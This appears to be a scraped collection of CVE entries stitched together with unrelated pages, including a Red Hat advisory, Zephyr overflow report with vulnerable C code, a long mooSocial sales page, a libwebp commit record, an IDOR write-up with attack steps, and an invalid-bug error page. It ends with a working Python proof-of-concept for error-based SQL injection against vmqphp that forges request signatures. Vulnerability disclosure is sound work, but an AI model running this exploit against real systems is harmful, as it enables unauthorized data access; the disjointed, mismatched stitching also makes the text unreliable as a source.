A flaw was found in APICast, when 3Scale's OIDC module does not properly evaluate the response to a mismatched token from a separate realm. This could allow a separate realm to be accessible to an attacker, permitting access to unauthorized information.

'2163586?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2023-0456: Invalid Bug ID

A flaw was found in Red Hat's AMQ-Streams, which ships a version of the OKHttp component with an information disclosure flaw via an exception triggered by a header containing an illegal value. This issue could allow an authenticated attacker to access information outside of their regular permissions.

Issued:

2023-03-14

Updated:

2023-03-14

**RHSA-2023:1241 - Security Advisory**

*   Overview

**Synopsis**

Moderate: Red Hat AMQ Streams 2.2.1 release and security update

**Type/Severity**

Security Advisory: Moderate

**Topic**

Red Hat AMQ Streams 2.2.1 is now available from the Red Hat Customer Portal.  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency.  

This release of Red Hat AMQ Streams 2.2.1 serves as a replacement for Red Hat AMQ Streams 2.2.0, and includes security and bug fixes, and enhancements.  

Security Fix(es):  

*   Red Hat AMQ Streams: component version with information disclosure flaw (CVE-2023-0833)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat JBoss Middleware Text-Only Advisories for MIDDLEWARE 1 x86\_64

**Fixes**

*   BZ - 2169845 - CVE-2023-0833 Red Hat A-MQ Streams: component version with information disclosure flaw

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

CVE-2023-0833

Two potential buffer overflow vulnerabilities at the following locations in the Zephyr eS-WiFi driver source code.

**Summary**

I spotted two potential buffer overflow vulnerabilities at the following locations in the Zephyr eS-WiFi driver source code:  
https://github.com/zephyrproject-rtos/zephyr/blob/main/drivers/wifi/eswifi/eswifi\_core.c#L493  
https://github.com/zephyrproject-rtos/zephyr/blob/main/drivers/wifi/eswifi/eswifi\_shell.c#L43

**Details**

Potential off-by-one buffer overflow in /drivers/wifi/eswifi/eswifi\_core.c:

int eswifi\_mgmt\_iface\_status(const struct device \*dev,
			     struct wifi\_iface\_status \*status)
{
	struct eswifi\_dev \*eswifi \= dev\->data;
	struct eswifi\_sta \*sta \= &eswifi\->sta;

	/\* Update status \*/
	eswifi\_status\_work(&eswifi\->status\_work.work);

	if (!sta\->connected) {
		status\->state \= WIFI\_STATE\_DISCONNECTED;
		return 0;
	}

	status\->state \= WIFI\_STATE\_COMPLETED;
	strcpy(status\->ssid, sta\->ssid); /\* VULN: off-by-one (sta->ssid\[33\] copied over status->ssid\[32\]) \*/ 
	status\->ssid\_len \= strlen(sta\->ssid);
	status\->band \= WIFI\_FREQ\_BAND\_2\_4\_GHZ;
	status\->channel \= 0;
...

Potential static buffer overflow in /drivers/wifi/eswifi/eswifi\_shell.c:

static int eswifi\_shell\_atcmd(const struct shell \*sh, size\_t argc,
			      char \*\*argv)
{
	int i;

	if (eswifi \== NULL) {
		shell\_print(sh, "no eswifi device registered");
		return \-ENOEXEC;
	}

	if (argc < 2) {
		shell\_help(sh);
		return \-ENOEXEC;
	}

	eswifi\_lock(eswifi);

	memset(eswifi\->buf, 0, sizeof(eswifi\->buf));
	for (i \= 1; i < argc; i++) {
		strcat(eswifi\->buf, argv\[i\]); /\* VULN: static buffer overflow \*/
	}
	strcat(eswifi\->buf, "\\r");

	shell\_print(sh, "> %s", eswifi\->buf);
	eswifi\_at\_cmd(eswifi, eswifi\->buf);
	shell\_print(sh, "< %s", eswifi\->buf);

	eswifi\_unlock(eswifi);

	return 0;
}

**PoC**

I haven't tried to reproduce these potential vulnerabilities against a live install of the Zephyr OS.

**Impact**

If the unchecked inputs above are attacker-controlled and cross a security boundary, the impact of the buffer overflow vulnerabilities could range from denial of service to arbitrary code execution.

CVE-2023-4259: Potential buffer overflow vulnerabilities in the Zephyr eS-WiFi driver

A Cross-Site Request Forgery (CSRF) in admin_manager.php of Seacms up to v12.8 allows attackers to arbitrarily add an admin account.

**CVE-2023-43278**

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

\[CVE-ID\]

CVE-2023-43278

\[PRODUCT\]

Seacms <=12.8

\[VERSION\]

Seacms <=12.8

\[PROBLEM TYPE\]

CSRF

\[DESCRIPTION\]

There is a CSRF vulnerability in the backend management system of seacms v12.8

CVE-2023-43278: CVE-2023-43278_sugaryzheng的博客-CSDN博客

mooSocial v3.1.8 was discovered to contain a cross-site scripting (XSS) vulnerability via the change email function.

*   Home
*   Features
*   Screenshots
*   Pricing
*   Services
*   Testimonials
*   Showcases
*   Add-ons
*   Contact

**Mobile Friendly Social Network Software**

mooSocial is the best social network script to create a niche community or social site. It is features packed, highly configurable, expandable with many quality add-ons. mooSocial is mobile-friendly ready, it is easily accessible thru mobile web or Android and iOS mobile apps. Start your community site in minutes, It is easy to use even without design or programing skills.

Or

See people talking about us

Great aftermarket customer services

Reviewed by **Eddie Alder**

Fantastic product and customer support!

Reviewed by **Brett Cohen**

I have had only good experiences with the software mooSocial

Reviewed by **Dejan Dejan**

Hands down the best social network software period!

Reviewed by **Julian Hughes**

**Why Choose mooSocial?**

mooSocial is a **"white labeled" php social network software.  
It is **light, fast, easy to customize, and mobile-friendly.****

**

**Full Feature**

With all the features to build a successful social network e.g. blog, photo, group, event, video, topic…

**Monetization**

MooSocial supports many monetization methods such as advertising placement services, ad-free membership or exclusive access rights.

**Quick Support**

Multiple support channels (ticket, skype, community and online chat), Active Development and Docs

**Performance**

It has a lightweight codebase which will run blazingly fast even on a shared web hosting service.

**Mobile Apps**

Our publishable mobile apps will bring your community closer customer’s finger tip and allow you to engage with your members in a whole new way.

**No limit on code access**

Get all source code include mobi app source code.

**Addons**

Expand your social network easily, affordably with high-quality plugins and themes made by the same team. Most of plugins are compatible with Mobile Apps

**Internationalization (I18n)**

MooSocial is able to cater to users in different languages. It can handle multiple languages, scripts and cultural conventions (currency, sorting rules, number and dates formats…) without the need for redesign.

**Zero headache**

Zero headache to deal with 3rd party developers and compatible issues between developers becuase everything is from mooSocial Team





**

**

*   Full Features  - Click here to see a full list of features
    
    **User Profile**
    
    *   Activity Feed
    *   Friends
    *   Profile Privacy Settings
    *   Profile Cover Picture
    *   Profile Search
    *   Searchable Custom Profile Fields
    *   Featured Profile
    *   Friendly Profile URL
    
    **Video Sharing**
    
    *   Easily Share Youtube/Vimeo Videos
    *   Privacy Options
    *   Comments & Likes
    *   Tags
    *   Social Sharing
    *   Videos Search & Category
    *   Related Videos
    
    **User Group**
    
    *   Activity Feed
    *   Group Photos, Videos, Topics
    *   Invitation System
    *   Privacy Options
    *   Featured Groups
    *   Group Search & Category
    *   Social Sharing
    *   Membership Approval
    
    **User Blog**
    
    *   WYSIWYG Editor
    *   Privacy Options
    *   Comments & Likes
    *   Tags
    *   Images Uploader
    *   Social Sharing
    *   Blogs Search
    
    **Discussion Topics**
    
    *   Attachments
    *   WYSIWYG Editor
    *   Comments & Likes
    *   Tags
    *   Social Sharing
    *   Topics Search & Category
    *   Pin/Lock Topic
    
    **Photo Album**
    
    *   Photo Tagging
    *   Privacy Options
    *   Comments & Likes
    *   Tags
    *   Easy Uploader
    *   Social Sharing
    *   Albums Search & Category
    
    **Admin Panel**
    
    *   Admin Notifications
    *   Custom Blocks
    *   Easy Logo Changer
    *   Bulk Mail
    *   Spam Challenges
    *   User Roles/Permissions
    *   Pages Manager
    *   Hooks Manager
    *   Plugins Manager
    *   Themes Manager
    *   Languages Manager
    
    **Miscellaneous**
    
    *   Mobile Site
    *   Private Message
    *   Notifications Center
    *   Friends Suggestion
    *   URL & Video Parsing in Activity Feed
    *   Upload Photo in Activity Feed
    *   Facebook Integration
    *   Global Search
    *   Item Reporting
    
    **Event Management**
    
    *   RSVP Tracking
    *   Activity Feed
    *   Invitation System
    *   Privacy Options
    *   Event Search & Category
    *   Social Sharing
    *   Event Map
    
    **Monetize Features**
    
    *   Membership Subscription
    *   PayPal Adaptive Payments
    *   Ad Network Support
    

**

**

**Pricing + Combo**

*   mooSocial Self-hosted
*   mooSocial Cloud

**mooSocial License**

**$ 99**

One-time-fee  
(1 domain)

30-days free support

Include All Core Features and Core Plugins: Blogs, Photos Videos, Topics, Groups, Events

Full Source Code

First time free installation service

White-label. Customizable

12 Months Update Subscription

You can buy mooSocial license now then get the apps in combo packages later here

Recommended

**Deluxe**

**

$697

$ 669**

One-time-fee  
(1 domain)

mooSocial Pro Licence ($299)

Android and IOS Licence ($398)

Full Source Code

First time free installation service

White-label. Customizable

REST API Library

12 Months Update Subscription

60-days free support

**Ultimate**

**

$3164

$ 1669**

**Services**

**SOFTWARE MODIFICATION**

Want a unique feature? A specialized  
plugin? or even some simple changes?  
Sure! Our Customization Team will  
develop it for you quickly and  
efficiently.

**THEME DEVELOPMENT**

Distinguish your site with style. Our  
Design Team knows how to create  
unique visual experiences which are  
crucial to the success of your business.

**SITE MIGRATION**

Have a Social Network already but  
wanted to move to mooSocial? No  
problem, our Digital Mover Team will  
have you settled in your new home  
comfortably.

**PRODUCT INSTALLATION**

Installing mooSocial is a "no brainer".  
However, if you do not want to be  
bothered with it, we could help to get  
your new site up and running in no time.

**PRODUCT UPGRADE**

It doesn't matter which version you  
currently have, or even if our script was  
modified. We can upgrade your site to  
the greatest and latest with everything  
intact.

**INTEGRATION**

We can get mooSocial integrated with  
any service out there whether it is a  
payment gateway or a CMS. As long as  
there is API access, We can do it.

**What people say about us**

**Fantastic product and customer support!**

The folks at mooSocial have been fantastic. They assisted me in getting the product installed on my server and have been so helpful. The product itself is top notch, I did not come across any other product that is so perfect for social media.

Reviewed by Brett Cohen

**Hands down the best social network software period!**

I give it 10 stars if I could. Ryan and his team provide excellent customer support and best of all, the best social network software on the market. Your time and money will not be waste if you go with this company. Other softwares are full of bugs but this one is a winner!

Reviewed by Julian Hughes

**Moosocial Best Platform Ever!!!**

Moosocial Best Platform with all the tools you need for a social network, and marketing website, a lot of potential for the price, is nicely succeeding on the tools they are providing. It has a wiki, an instant messages, document management system - all (and a lot more) integrated in one extensible platform. Very recommended! Attractive interface and full of functionalities. Also excellent support from their community.

Reviewed by William D. Abreu

**Best around!**

We had tried many platforms including JomSocial, Dolphin.Pro, And Users Ultra before finding MooSocial. Let me just say that MooSocial is the absolute BEST social networking platform we've seen. The platform is great, the staff are helpful, and the community is helpful.

Reviewed by Jordan Dawson

**Very great powerful script for social network**

i used to be with oxwall until i bumped into moo social its got so much more great stuff that wow,ed me the support has been great and moosocial is so much awesome :) keep up the great work

Reviewed by snitch567

**Best script, ready made social site**

I searched years for a good script, tried many out there, ans spent hard earned money looking for a great script to have a small social site. I was ready to quit, then happened across moosocial. It was a dream come true. You don't have to be a coder to have a great light script.

Reviewed by Mikailah

**5 stars!**

Awesome script and best social network script out there period. I dont see no bugs and installation was so simple. Great support too!

Reviewed by julz

**Showcases**

*   
*   
*   
*   

**Spice up your networks with these Add-ons and Turnkey Solutions**

*   
*   
*   
*   
*   
*   

MORE ADD-ONS

**F.A.Q**

*   Frequently Asked Questions
*   More FAQs

**Does your license expire?**

No, mooSocial License does not exprie. It is a perpetual license and you can use our software indeﬁnitely.

**Will I be able to download updates in the future if I buy now?**

Yes, all updates are free to download as long as your software update subscription is active. Each license includes a 12 months update subscription.

**What happens after my update subscription expires?**

You can renew your update subscription for a minimal cost. Otherwise, you can continue using the software on your site.

**How much does it cost to renew my update subscription?**

$49 for every 12 months.

**Is the source code encrypted?**

No, you have 100% access to the source code.

**Can I modify the software to meet my requirements?**

Yes, you can do whatever modifications that you wish.

**Do I need to have any mooSocial branding on my site?**

Absolutely not. Unlike other prodducts, we do not force you to have our branding on your site

**Do you offer custom service?**

Yes, we do provide custom theme & development service. Please contact us for more details

**What payment methods do you accept?**

Currently, we accept Paypal, Visa/Master card (via Paypal), Western Union and MoneyGram

**Is it easy to translate the software?**

Yes, very easy. All the language strings are in a single language file. You can also install a third party software to make your translation even easier.

**What are the server requirements?**

Minimum:

*   PHP 5.4+
*   MySQL 5+
*   PHP extensions: MySql PDO, GD2, Curl, libxml, exif, zlib (if you need to export theme)
*   Magic quotes must be disabled
*   Memory Limit: 128M+

Recommended:

*   Apache server with mod\_rewrite

**Do I have to pay extra to remove any mentions of mooSocial?**

No, absolutely not.

**Do you offer an installation of upgrades?**

We do offer an upgrade installation service, the cost of the upgrading service will depend on how many hours we need to spend to re-apply any customizations you've made so far.

**How many users can mooSocial support?**

It is primarily dependent on the capabilities of your server. On shared hosting, mooSocial be able to support tens of thousands of users, while a single dedicated server can usually support upwards of one hundred thousand however we make no guarantee of performance due to the many variables involved. For each case of servers, we need to analyze to optimize if it problem happened.

**How soon will I receive my download information after purchasing?**

You will receive your download information very shortly after purchase..

**Is my billing information kept private when I purchase?**

Absolutely. In fact, we never see or store your billing information on our servers. Your information is processed via paypal secure payment gateway.

**How many licenses do I need?**

Each license is valid for a single public installation of the software, regardless of domains. You are of course welcome to create a private copy for development purposes.

**Do I need more than one license if i'm installing mooSocial on several subdomains/directories?**

Yes, every installation of mooSocial requires a license. However, you are entitled to create a second private installation for development purposes provided it's not publicly accessible.

**If I upgrade to a new version, will I lose my customizations or admin panel settings?**

This depends on what type of customizations you've made. If you've simply created new files and linked to them from mooSocial, it's unlikely that you will lose any customizations you've made. If you've edited the core code and you overwrite it with the new files from the upgrade package, you may lose your customizations. To avoid this, please make sure you full backup before upgrading, use compare tool to compare and merge changes that you made into the new core code. We do provide upgrading service so that contact us if you’re not sure what you should do.

**Do you offer trial version?**

Yes, Please download at https://moosocial.com/free-trial-download/

**Can I redistribute or resell mooSocial?**

No, you are not allowed to redistribute or resell mooSocial in any way.

**Can I extend my support service?**

Yes, support service can be purchased for $39/month.

**Can mooSocial be installed in a subdirectory or subdomain?**

Yes,You can install it on any location on your server.

**Can I Try Before I Buy?**

Please download it here https://moosocial.com/free-trial-download/

**Will I lose all my users if I upgrade?**

All user data and settings will be retained after upgrading. Make sure you full backup your site before upgrading.

**Do I get support with my purchase?**

After purchasing a license, you will receive a 30 days FREE support service via our ticket system, online chat or client community at http://community.moosocial.com/

**What type of issues does support cover?**

Our support team will assist with initial Software installation, general questions related to the script and technical errors encountered during the normal use of unmodified script. We cannot assist with customization of the script.

**How long do I get support after purchase?**

Up to 60 days of support

**How long does it take to get a response from support?**

Response times vary based on ticket volume but we do our best to respond to all tickets within several hours during business hours, or the next business day if submitted during off hours.

**Can I sell my website in the future?**

Yes, you're free to sell your website but not your mooSocial license since the licenses are non-transferable. In other words, if you choose to sell your website which contains a mooSocial license on it, the new owner would need to purchase their own license. What many clients do is simply incorporate the cost of the new license into the sale price of the website and purchase a new license on behalf of the new owner.

**Can I hire mooSocial to write custom plugins/customizations?**

Yes, we’re happy to help.

**I don't have a domain yet. Can I still purchase mooSocial?**

Yes! You can purchase mooSocial now and update your registered domain name later.











**

CVE-2023-43326: mooSocial - PHP Social Networking Software

In Bluetooth mesh implementation If provisionee has a public key that is sent OOB then during provisioning it can be sent back and will be accepted by provisionee.



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-4258: bt: mesh: vulnerability in provisioning protocol implementation on provisionee side

With a specially crafted WebP lossless file, libwebp may write data out of bounds to the heap.

The ReadHuffmanCodes() function allocates the HuffmanCode buffer with a size that comes from an array of precomputed sizes: kTableSize. The color_cache_bits value defines which size to use.

The kTableSize array only takes into account sizes for 8-bit first-level table lookups but not second-level table lookups. libwebp allows codes that are up to 15-bit (MAX_ALLOWED_CODE_LENGTH). When BuildHuffmanTable() attempts to fill the second-level tables it may write data out-of-bounds. The OOB write to the undersized array happens in ReplicateValue.



)\]}' { "commit": "902bc9190331343b2017211debcec8d2ab87e17a", "tree": "4f26b537e953ef6ba3d465ea96f30eedbac8737e", "parents": \[ "7ba44f80f3b94fc0138db159afea770ef06532a0" \], "author": { "name": "Vincent Rabaud", "email": "vrabaud@google.com", "time": "Thu Sep 07 19:16:03 2023" }, "committer": { "name": "Vincent Rabaud", "email": "vrabaud@google.com", "time": "Thu Sep 07 19:16:03 2023" }, "message": "Fix OOB write in BuildHuffmanTable.\\n\\nFirst, BuildHuffmanTable is called to check if the data is valid.\\nIf it is and the table is not big enough, more memory is allocated.\\n\\nThis will make sure that valid (but unoptimized because of unbalanced\\ncodes) streams are still decodable.\\n\\nBug: chromium:1479274\\nChange-Id: I31c36dbf3aa78d35ecf38706b50464fd3d375741\\n", "tree\_diff": \[ { "type": "modify", "old\_id": "4501216298b34662010af4a1c950b1d087966bef", "old\_mode": 33188, "old\_path": "src/dec/vp8l\_dec.c", "new\_id": "5ab34f56cd83347bc7442570434931e8210f3c3a", "new\_mode": 33188, "new\_path": "src/dec/vp8l\_dec.c" }, { "type": "modify", "old\_id": "72b2e861208447f45e5ee12eac57b9c36ff2cd31", "old\_mode": 33188, "old\_path": "src/dec/vp8li\_dec.h", "new\_id": "32540a4b88a05cc74b88f11da3f143e83be81c9c", "new\_mode": 33188, "new\_path": "src/dec/vp8li\_dec.h" }, { "type": "modify", "old\_id": "90c2fbf7c18c79ccb3597fe7cbbc332dbd1b2548", "old\_mode": 33188, "old\_path": "src/utils/huffman\_utils.c", "new\_id": "cf73abd437d02173f43c61c8877a5f467997774a", "new\_mode": 33188, "new\_path": "src/utils/huffman\_utils.c" }, { "type": "modify", "old\_id": "13b7ad1ac40c5316f5506d9b4cbf5039c9fd5600", "old\_mode": 33188, "old\_path": "src/utils/huffman\_utils.h", "new\_id": "98415c532895374ea28fc1dc5c9a15c751ea9ba0", "new\_mode": 33188, "new\_path": "src/utils/huffman\_utils.h" } \] }

CVE-2023-5129

An array indexing vulnerability was found in the netfilter subsystem of the Linux kernel. A missing macro could lead to a miscalculation of the `h->nets` array offset, providing attackers with the primitive to arbitrarily increment/decrement a memory buffer out-of-bound. This issue may allow a local user to crash the system or potentially escalate their privileges on the system.

**Red Hat Product Security Center**

Engage with our Red Hat Product Security team, access security updates, and ensure your environments are not exposed to any known security vulnerabilities.

Product Security Center

CVE-2023-42753: cve-details

An issue in Service Provider Management System v.1.0 allows a remote attacker to gain privileges via the ID parameter in the /php-spms/admin/?page=user/ endpoint.

**About the Application**

This Service Provider Management System v.1.0 is a sort of Content Management System (CMS) that is built specifically for companies that provide different services. The project is a company website that allows the management to dynamically manage the site information and other data on the front end. This project has 2 modules which are the Public and Management site.

The Management Site is the side of the system where accessible to the company staff or system-registered users only. On this site, users are required to log in with their valid system credentials to gain access to the features and functionalities. Users have 2 different roles which are the Administrator and the Staff. The Administrator users have the privilege to manage and access all the features and functionalities of the said site while the Staff users only have limited permissions. Here, system users can manage the list of services that their company provided. They can also update the dynamic page content of the public website on this side.

**Vulnerability Description**

Privilege Escalation in Service Provider Management System v.1.0 allows a remote attacker to gain privileges via the ID parameter in the /php-spms/admin/?page=user/manage_user&id=9 endpoint.

**Vulnerable Code**

**Filename:** /php-spms/admin/user/manage_user.php

**Vulnerable Endpoint:** /php-spms/admin/?page=user/manage_user&id=9

**Vulnerable Parameter:** id

**Code:**

1
2
3
4
5
6
7
8
9
10
11
12

<?php 
if(isset($_GET['id'])){
    $user = $conn->query("SELECT * FROM users where id ='{$_GET['id']}' ");
    foreach($user->fetch_array() as $k =>$v){
        $meta[$k] = $v;
    }
}
?>
<?php if($_settings->chk_flashdata('success')): ?>
<script>
	alert_toast("<?php echo $_settings->flashdata('success') ?>",'success')
</script>

The code checks if the id parameter is set in the URL but does not verify whether the authenticated user has the appropriate permissions to access the user data associated with that id. It assumes that anyone with the id parameter can access any user’s information. This oversight creates a security vulnerability known as ‘Broken Access Control (BAC), especially concerning the id parameters.

Broken Access Control is a security vulnerability in web applications and systems where proper access controls are not enforced, allowing unauthorized users to gain access to resources, perform actions they shouldn’t, or manipulate the system in unintended ways. Examples include inadequate authorization checks, missing authentication, direct object reference, overly permissive permissions, and failure to revoke access. To mitigate this issue, applications should implement strong access controls, enforce authentication and authorization rigorously, follow least privilege principles, and regularly test for and address potential access control problems.

**Impact of Broken Access Control**

The exact reasons for the impact of broken access control in a web application or system include:

**Unauthorized Access**: Broken access control allows unauthorized users to gain access to resources and functionality that should be restricted to certain users or roles.

**Data Exposure**: When access controls are not properly enforced, sensitive data can be exposed to users who shouldn’t have access, leading to data leaks and breaches.

**Data Manipulation**: Attackers can alter, delete, or insert data into the system, potentially causing data corruption and fraudulent activities.

**Attack Scenario**

*   Go to http://localhost/php-spms/admin/?page=user/list and create 2 user, alice as administrator and bob as staff.

_User creation_

*   Let’s view both user and notice the id assigned to each user.

_User id of both user_

*   Let’s login as bob who is a staff and visit the URL http://localhost/php-spms/admin/?page=user/manage_user&id=12

_Logged in as bob_

*   Let’s change the id value from 12->11 and see if we can access the details of user alice.

_Alice’s detail is accessible by bob_

*   We can able to view the information of alice, let’s try to change the password of alice.

_Alice’s password is changed_

Remediating broken access control vulnerabilities is crucial to secure your web application or system. To address these vulnerabilities effectively, follow these remediation steps:

**Implement Proper Authentication and Authorization**: Ensure that your application uses strong authentication mechanisms to verify user identities. Use multi-factor authentication (MFA) for added security. Implement fine-grained authorization controls based on user roles and privileges. Users should only have access to resources and actions they are authorized to use.

**Access Control Lists (ACLs) or Role-Based Access Control (RBAC)**: Implement ACLs or RBAC to define and manage access permissions for users and resources. This helps maintain a clear and structured access control policy.

**Secure Session Management**: Implement secure session management to ensure that session tokens are generated securely, invalidated after logout or inactivity, and protected against session fixation attacks.

That’s all in this writeup.

Thanks for reading this far. If you enjoyed the writeup, do support me **here**.

CVE-2023-43457: CVE-2023-43457 - Broken Access Control (BAC)

szvone vmqphp <=1.13 is vulnerable to SQL Injection. Unauthorized remote users can use sql injection attacks to obtain the hash of the administrator password.

import requests

import re

import hashlib

import time

url \= "http://127.0.0.1:887" \# target ip

payload1 \= "/index/index/closeOrder?orderId\[123\]=123"

res \= requests.get(url \= url + payload1)

r \= re.findall('\\'key\\' => \\'<a class="toggle" title="(.\*?)"\\>', res.text) \# to get hash key

key \= r\[0\]

print(key)

payId \= 'hello5' \# Enter any one

mytype \= "1e0'-updatexml(1,concat(0x7e,user(),0x7e,version(),0x7e),3)-'1" #SQL statements injected with errors

price \= '1100' #It is best to write an integer of 100, and it cannot be repeated with the previous

byte\_sign \= (payId + mytype + price + key).encode(encoding\='utf-8')

sign \= hashlib.md5(byte\_sign).hexdigest()

payload2 \= "/createOrder?payId="+payId+"&type="+mytype+"&price="+price+"&sign="+sign

print(url+payload2) #Get the payload and access it directly in the browser